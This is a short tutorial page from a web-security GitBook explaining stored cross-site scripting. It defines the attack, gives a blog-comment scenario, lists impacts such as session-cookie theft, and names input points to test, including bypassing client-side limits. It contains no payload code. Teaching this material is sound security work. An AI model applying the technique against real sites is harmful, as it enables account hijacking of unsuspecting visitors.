Passion
  • What is this GitBook about ?
  • Privilege Escalation
    • Linux
    • Windows
  • Network Security
    • Port Scanning
    • DNS Enumeration
    • FTP Enumeration
    • SSH Enumeration
    • SMB Enumeration
    • SMTP Enumeration
    • POP3 Enumeration
  • Checklists
    • Active Directory Security
    • OS Command Injection
    • Buffer Overflow
    • Broken Access Control
    • Local File Inclusion
    • SSRF
    • XXE Attacks
    • SQL Injection
    • XSS
  • WebApp Security
    • Local File Inclusion
    • File Upload Attacks
      • IIS Server File Upload
      • Escaping Sandbox via File Upload
    • Broken Access Control
      • Vertical PrivEsc
      • Horizontal PrivEsc
      • Horizontal => Vertical
    • OS Command Injection
    • SSTI
      • Finding the Injection Point
      • Indentification
      • Exploitation
    • XXE Attacks
      • XXE to LFI
      • XXE to SSRF
      • XXE via File upload
      • XInclude Attacks
      • Blind XXE Attacks
        • Identification
        • Exploitation
        • Blind XXE to LFI
        • Blind XXE by defining Local DTD
    • SQL Injection
    • Server Side Request Forgery
      • Various Attack Methods
      • Exploiting Blind SSRF
    • OAuth Attacks
      • In Password-Based Logins
    • XSS
      • Reflected XSS
      • Stored XSS
      • DOM XSS
      • Blind XSS
      • Perfecting our Payload
      • Exploiting Blind XSS
  • WebApp Mitigations
    • SSTI
  • Docker Security
    • Configuration
    • Ngnix Deployment
  • ☁️Cloud Security
    • AWS
      • Cloud Breach S3
      • IAM PrivEsc - RollBack
      • IAM PrivEsc - Attachment
Powered by GitBook
On this page
  • Example Scenario
  • Impact
  • How to test for Stored XSS
  1. WebApp Security
  2. XSS

Stored XSS

PreviousReflected XSSNextDOM XSS

Last updated 2 years ago

As the name infers, the XSS payload is stored on the web application (in a database, for example) and then gets run when other users visit the site or web page

Example Scenario

A blog website that allows users to post comments. Unfortunately, these comments aren't sanitized - If we now post a comment containing JavaScript code, this will be stored in the database, and every other user now visiting the article will have the JavaScript run in their browser

Impact

The malicious JavaScript could redirect users to another site, steal the user's session cookie, or perform other website actions while acting as the visiting user

How to test for Stored XSS

  • Comments on a blog

  • User profile's information

  • Website Listings

Sometimes developers think limiting input values on the client-side is good enough protection so changing values to something the web application wouldn't be expecting is a good source of discovering stored XSS

For Example, an age field that is expecting an integer from a dropdown menu but instead, you manually send the request rather than using the form allowing you to try malicious payloads